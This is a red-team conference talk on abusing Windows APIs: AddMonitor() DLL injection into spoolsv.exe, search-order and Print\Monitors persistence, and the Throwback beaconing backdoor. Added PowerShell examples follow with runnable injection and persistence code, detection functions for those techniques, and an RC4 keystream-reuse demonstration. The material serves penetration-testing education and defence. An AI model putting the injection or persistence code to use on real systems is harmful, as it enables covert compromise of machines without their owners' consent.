Getting Windows to Play with Itself
A Hacker's Guide to Windows API Abuse

Brady Bloxham
Founder/Principal Security Consultant
@silentbreaksec
http://www.silentbreaksecurity.com
http://www.blacksquirrel.io

Background
•  Shorten the gap between penetration test and actual attack
•  Few covert persistence tools
•  Reduce reliance on Metasploit

Got a lot to cover
•  DLL Injection
•  Persistence
•  Throwback
•  Lots of demos along the way

DLL Injection
•  Traditional methods
   •  CreateRemoteThread()
   •  NtCreateThreadEx()
   •  RtlCreateUserThread()
   •  NtQueueApcThread()
   •  Can blue screen certain OSes
•  Code cave
   •  Suspend process
   •  Inject code
   •  Change EIP to location of injected code
   •  Resume process
   •  Difficult on x64

AddMonitor()
•  +
   •  Injects into spoolsv.exe
   •  Doesn't require matching architecture
   •  Easy to use
•  -
   •  DLL must be on disk
   •  Requires administrator privs

DLL Injection Demo

Persistence
•  Lots of persistence in Windows
   •  Service
   •  Run keys
   •  Schtasks
   •  …
•  And lots still to find…
   •  Lots of techniques
   •  Process Monitor
   •  Hook LoadLibrary()

[Process Monitor screenshot: PID 2884 loads C:\Windows\System32\wbem\fastprox.dll, then CreateFile on C:\Windows\System32\wbem\NTDSAPI.dll returns NAME NOT FOUND before C:\Windows\System32\ntdsapi.dll is opened and mapped (SUCCESS), followed by C:\Windows\System32\comsvcs.dll. The file probed first and missing from the wbem directory is the load point used by the 1st technique below.]

Persistence
•  1st Technique
   •  Requires VMware Tools be installed
   •  Just drop a DLL to disk
   •  c:\windows\system32\wbem\ntdsapi.dll
   •  Note: the DLL must export the same functions as the real ntdsapi.dll
•  2nd Technique
   •  VMware patched in ESXi 5.5
   •  Requires VMware Tools be installed
   •  Just drop a DLL to disk
   •  c:\windows\system32\wbem\tpgenlic.dll
   •  c:\windows\system32\wbem\thinmon.dll

Persistence
•  3rd Technique
   •  HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors\
   •  Create a new key
   •  Create a new value named Driver with the DLL name
   •  Create as many as you like

Persistence Demo

Windows API HTTP Cheatsheet
•  WinHTTP
   •  Intended for services
   •  Does not pull user proxy settings
   •  Supports impersonation
•  WinINet
   •  More robust in proxy environments
   •  Variety of flags that enable/disable functionality automatically
   •  Prompts user for password if authentication is required
   •  Uses IE settings

What is Throwback?
•  C++ HTTP/S beaconing backdoor
•  PHP control panel w/ MySQL backend
•  Built for stealth
•  Persistence built-in
   •  DLL
   •  EXE

[Diagram: Infected User → Proxy / Firewall → ThrowbackLP (two listening posts) ← Attacker]

Throwback Features
•  Robust proxy detection
•  Distributed LPs
•  Uses MSGRPC to generate MSF payloads
•  RC4 encrypted comms
•  Implements reflective DLL injection
•  String encryption

[Screenshot: Throwback Control Panel, Aug 5, 2014, 4:54 pm. Tasking form with Action, Command and Arguments fields; callback table with columns Status, Version, IP Address, Target Name, Period, Last Callback and Actions (History, Radar), listing four implants (versions 2.16 and 2.50) on 192.168.20.x hosts named IETEMPLATE, IE11TEMPLATE, IE10TEMPLATE and IE9TEMPLATE with 1- and 10-minute callback periods.]

Throwback Demo

Going Forward…
•  Community based project!!!
•  Create modules
   •  Keylogger, Mimikatz, Hashdump, etc.
   •  Various transport methods
•  Additional persistence techniques
•  Modification of comms

The End

Shameless Plug
•  Interested in writing custom malware/backdoors?
   •  Dark Side Ops: Custom Penetration Testing
   •  Blackhat Europe and East Coast Trainings
•  Pen test networks from your browser
   •  https://www.blacksquirrel.io
•  Silent Break Security
   •  Blackbox/Red Team Pen Testing
   •  brady@silentbreaksecurity.com
   •  @silentbreaksec
   •  https://github.com/silentbreaksec
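Worked example for the AddMonitor() slide. This is an added example, not code from the talk or from Throwback: it calls the documented winspool.drv functions AddMonitor() and DeleteMonitor() through P/Invoke from an elevated PowerShell session. The monitor name and the DLL file name are placeholders, and the DLL is assumed to already sit in %SystemRoot%\System32, where the spooler resolves a bare pDLLName (the slide's "DLL must be on disk").

```powershell
# Added example, not the talk's code: load a DLL into spoolsv.exe with AddMonitor().
# Assumes an elevated session and a DLL already present in %SystemRoot%\System32.
$spoolApi = @'
using System;
using System.Runtime.InteropServices;

public static class Spool
{
    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    public struct MONITOR_INFO_2
    {
        public string pName;         // display name of the new port monitor
        public string pEnvironment;  // spooler's environment, e.g. "Windows x64"
        public string pDLLName;      // bare file name; the spooler loads it from System32
    }

    [DllImport("winspool.drv", CharSet = CharSet.Unicode, SetLastError = true)]
    public static extern bool AddMonitor(string pName, uint Level, ref MONITOR_INFO_2 pMonitors);

    [DllImport("winspool.drv", CharSet = CharSet.Unicode, SetLastError = true)]
    public static extern bool DeleteMonitor(string pName, string pEnvironment, string pMonitorName);
}
'@
if (-not ([System.Management.Automation.PSTypeName]'Spool').Type) {
    Add-Type -TypeDefinition $spoolApi
}

function Invoke-AddMonitorInjection {
    param(
        [Parameter(Mandatory)][string]$DllName,        # placeholder, e.g. 'demomon.dll', in System32
        [string]$MonitorName = 'Demo Port Monitor'     # placeholder monitor name
    )
    $mi = New-Object -TypeName 'Spool+MONITOR_INFO_2'
    $mi.pName = $MonitorName
    # pEnvironment names the spooler's environment (the OS architecture), not the caller's,
    # which is why the injecting process does not have to match spoolsv.exe's bitness.
    $mi.pEnvironment = if ([Environment]::Is64BitOperatingSystem) { 'Windows x64' } else { 'Windows NT x86' }
    $mi.pDLLName = $DllName

    $ok  = [Spool]::AddMonitor($null, 2, [ref]$mi)
    $err = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
    # By the time AddMonitor returns, spoolsv.exe has already called LoadLibrary on the DLL,
    # so its DllMain has run. A DLL without an InitializePrintMonitor2 export then makes the
    # call fail with ERROR_INVALID_PRINT_MONITOR (3007) and nothing stays registered.
    [pscustomobject]@{ Succeeded = $ok; Win32Error = $err }
}

function Test-SpoolerModuleLoaded {
    param([Parameter(Mandatory)][string]$DllName)
    # Verify from the outside: is the DLL currently mapped into spoolsv.exe?
    $spooler = Get-Process -Name spoolsv -ErrorAction Stop
    [bool]($spooler.Modules | Where-Object { $_.ModuleName -ieq $DllName })
}

function Remove-AddMonitorInjection {
    param([string]$MonitorName = 'Demo Port Monitor')
    # Unregisters the monitor, which removes its entry under Print\Monitors.
    [Spool]::DeleteMonitor($null, $null, $MonitorName)
}

# Usage (elevated):
# Invoke-AddMonitorInjection -DllName 'demomon.dll'
# Test-SpoolerModuleLoaded -DllName 'demomon.dll'
# Remove-AddMonitorInjection
```

A successful AddMonitor() call also writes the monitor under HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors, so the injection and the 3rd persistence technique end in the same registry key; DeleteMonitor() is the clean-up for both.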
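Worked example for the three persistence slides (the wbem search-order drops and the Print\Monitors key). This is added here and is not the speaker's code; it uses only built-in cmdlets and needs an elevated session. The monitor and DLL names are placeholders, and the two audit functions return candidates to review against a baseline of the build, not verdicts.

```powershell
# Added example, not the talk's code. Run elevated. Monitor and DLL names are placeholders.
$MonitorsKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Print\Monitors'
$System32    = Join-Path $env:SystemRoot 'System32'

function Add-PrintMonitorPersistence {
    # 3rd technique: a new subkey under Print\Monitors whose Driver value names a DLL that is
    # already in System32. The spooler loads it on its next start (Restart-Service Spooler).
    param(
        [Parameter(Mandatory)][string]$DllName,        # bare file name, e.g. 'demomon.dll' (placeholder)
        [string]$MonitorName = 'Demo Port Monitor'     # placeholder key name; add as many as you like
    )
    $key = New-Item -Path $MonitorsKey -Name $MonitorName -Force
    New-ItemProperty -Path $key.PSPath -Name Driver -Value $DllName -PropertyType String -Force | Out-Null
    Get-ItemProperty -Path $key.PSPath -Name Driver
}

function Get-SuspiciousPrintMonitor {
    # Defender's check for the 3rd technique (and for AddMonitor-registered monitors): every
    # monitor whose Driver DLL is missing from System32, unsigned, or not Microsoft-signed.
    Get-ChildItem -Path $MonitorsKey | ForEach-Object {
        $driver = (Get-ItemProperty -Path $_.PSPath).Driver
        if (-not $driver) { return }
        $path = if ([IO.Path]::IsPathRooted($driver)) { $driver } else { Join-Path $System32 $driver }
        $sig  = if (Test-Path -LiteralPath $path) { Get-AuthenticodeSignature -FilePath $path } else { $null }
        $subject = if ($sig -and $sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '' }
        [pscustomobject]@{
            Monitor = $_.PSChildName
            Driver  = $driver
            Path    = $path
            Status  = if ($sig) { $sig.Status.ToString() } else { 'Missing' }
            Signer  = $subject
            Flag    = (-not $sig) -or ($sig.Status -ne 'Valid') -or ($subject -notmatch 'Microsoft')
        }
    } | Where-Object { $_.Flag }
}

function Get-WbemShadowDll {
    # Check for the 1st/2nd technique: a DLL in System32\wbem that shadows a System32 DLL of
    # the same name (the ProcMon capture shows wbem\NTDSAPI.dll probed first and NAME NOT FOUND,
    # so a file placed there wins), plus the two names the talk gives for the 2nd technique.
    $wbem = Join-Path $System32 'wbem'
    Get-ChildItem -Path (Join-Path $wbem '*.dll') | Where-Object {
        (Test-Path -LiteralPath (Join-Path $System32 $_.Name)) -or
        ($_.Name -in @('tpgenlic.dll', 'thinmon.dll'))
    } | Select-Object FullName, LastWriteTime,
        @{ n = 'Signature'; e = { (Get-AuthenticodeSignature -FilePath $_.FullName).Status } }
}

# Usage (elevated):
# Add-PrintMonitorPersistence -DllName 'demomon.dll'; Restart-Service Spooler
# Get-SuspiciousPrintMonitor
# Get-WbemShadowDll
```

On Windows 7 with PowerShell 2, Get-AuthenticodeSignature does not validate catalog signatures, so in-box monitors show as NotSigned; baseline by name there (for example Local Port → localspl.dll, Standard TCP/IP Port → tcpmon.dll, USB Monitor → usbmon.dll, WSD Port → WSDMon.dll) before trusting the Flag column.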
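Added example for the "RC4 encrypted comms" feature bullet; this is not Throwback's code, and the slides do not say how Throwback keys RC4, so it is a general design caveat rather than a statement about Throwback. RC4 is a stream cipher: the keystream depends only on the key, so two messages encrypted under one key share a keystream and c1 XOR c2 = p1 XOR p2. The key and the beacon strings below are constructed for illustration.

```powershell
# Added example, not Throwback's code: RC4 keystream reuse in a beaconing protocol.
# Key and beacon messages are constructed for illustration.
function Get-Rc4Keystream {
    param([byte[]]$Key, [int]$Length)
    # Key-scheduling algorithm (KSA)
    $S = [int[]](0..255)
    $j = 0
    for ($i = 0; $i -lt 256; $i++) {
        $j = ($j + $S[$i] + $Key[$i % $Key.Length]) -band 0xFF
        $t = $S[$i]; $S[$i] = $S[$j]; $S[$j] = $t
    }
    # Pseudo-random generation algorithm (PRGA)
    $out = New-Object byte[] $Length
    $i = 0; $j = 0
    for ($n = 0; $n -lt $Length; $n++) {
        $i = ($i + 1) -band 0xFF
        $j = ($j + $S[$i]) -band 0xFF
        $t = $S[$i]; $S[$i] = $S[$j]; $S[$j] = $t
        $out[$n] = [byte]$S[($S[$i] + $S[$j]) -band 0xFF]
    }
    return $out
}

function Invoke-Rc4 {
    param([byte[]]$Key, [byte[]]$Data)   # encryption and decryption are the same XOR
    $ks = Get-Rc4Keystream -Key $Key -Length $Data.Length
    $r  = New-Object byte[] $Data.Length
    for ($n = 0; $n -lt $Data.Length; $n++) { $r[$n] = [byte]($Data[$n] -bxor $ks[$n]) }
    return $r
}

function Get-PlaintextFromReuse {
    # One known plaintext plus two ciphertexts made with the same key yields the other
    # plaintext without the key: p2 = c1 XOR c2 XOR p1 over the overlapping length.
    param([byte[]]$KnownPlaintext, [byte[]]$KnownCiphertext, [byte[]]$TargetCiphertext)
    $len = [Math]::Min($KnownCiphertext.Length, $TargetCiphertext.Length)
    $r = New-Object byte[] $len
    for ($n = 0; $n -lt $len; $n++) {
        $r[$n] = [byte]($KnownCiphertext[$n] -bxor $TargetCiphertext[$n] -bxor $KnownPlaintext[$n])
    }
    return [Text.Encoding]::ASCII.GetString($r)
}

$enc = [Text.Encoding]::ASCII
$key = $enc.GetBytes('static-implant-key')                      # constructed static key
$p1  = $enc.GetBytes('BEACON|IETEMPLATE|2.50|period=60|idle')    # constructed, predictable check-in
$p2  = $enc.GetBytes('BEACON|IETEMPLATE|2.50|task=ps -ef')       # constructed tasking reply

$c1 = Invoke-Rc4 -Key $key -Data $p1
$c2 = Invoke-Rc4 -Key $key -Data $p2

# Round trip works as expected for the key holder.
$enc.GetString((Invoke-Rc4 -Key $key -Data $c1))

# Anyone holding both ciphertexts and the predictable first beacon reads the second
# message (up to the shorter length) with no key at all.
Get-PlaintextFromReuse -KnownPlaintext $p1 -KnownCiphertext $c1 -TargetCiphertext $c2
```

The fix is to never reuse a keystream: derive a per-message key (for example hash the shared secret together with a random nonce that is sent in the clear) or move to an authenticated cipher. RC4 also provides no integrity, so a proxy in the path can flip plaintext bits by flipping ciphertext bits; a MAC over the ciphertext is needed before tasking is trusted.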